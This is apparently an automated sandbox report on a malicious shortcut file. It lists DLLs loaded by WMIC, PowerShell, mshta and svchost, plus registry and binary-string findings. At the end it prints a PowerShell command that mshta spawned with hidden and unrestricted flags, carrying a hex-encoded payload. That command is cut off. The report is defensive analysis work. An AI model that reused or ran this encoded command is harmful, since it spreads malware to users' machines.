Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: GYede3Gwn0.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506065317.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487288240.0000025067FDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488031202.0000025067FB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2492202557.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486345717.000002506C091000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB